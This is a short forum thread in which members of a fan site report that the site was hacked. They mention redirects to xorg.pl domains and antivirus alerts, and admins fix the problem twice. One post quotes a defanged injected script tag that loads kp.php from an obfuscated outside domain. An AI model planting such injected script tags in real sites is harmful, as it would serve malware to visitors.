8 posts / 0 new
Last post
djmax's picture
djmax
Offline
ED.Com SupporterKnowledge KeeperPaparazzi
Joined: 01/19/2009 - 22:05
Scripting Hack?

I've been redirected twice now from ed.com to various xorg.pl domains and it tries to run a js script that my a/v flags up. Looking at your source I can see this at the bottom, which looks very suspicious:

<script src="http://kdjkfjskdfjlskdjf "dot" com/kp.php"></script>

I_Love_Her's picture
I_Love_Her
Offline
ED.Com SupporterPaparazziWallPaper Maker
Joined: 12/03/2008 - 17:18

Yes, that's right dj, our hosting provider has some security issue and we are trying to find a way to fix the compromised files in our site.

http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html

I_Love_Her's picture
I_Love_Her
Offline
ED.Com SupporterPaparazziWallPaper Maker
Joined: 12/03/2008 - 17:18

Solved :applause:

The_Fifth_King's picture
The_Fifth_King
Offline
Paparazzi
Joined: 02/12/2009 - 10:37

Thanks.

There definitely was a problem yesterday.

djmax's picture
djmax
Offline
ED.Com SupporterKnowledge KeeperPaparazzi
Joined: 01/19/2009 - 22:05

I like how Go Daddy blames wordpress for everything even when guys without wordpress were infected.

djmax's picture
djmax
Offline
ED.Com SupporterKnowledge KeeperPaparazzi
Joined: 01/19/2009 - 22:05
I_Love_Her's picture
I_Love_Her
Offline
ED.Com SupporterPaparazziWallPaper Maker
Joined: 12/03/2008 - 17:18

3rd time, fixed

djmax's picture
djmax
Offline
ED.Com SupporterKnowledge KeeperPaparazzi
Joined: 01/19/2009 - 22:05

Avast detects modules/ad/serve.php as infected with the HTML:Script-inf trojan :(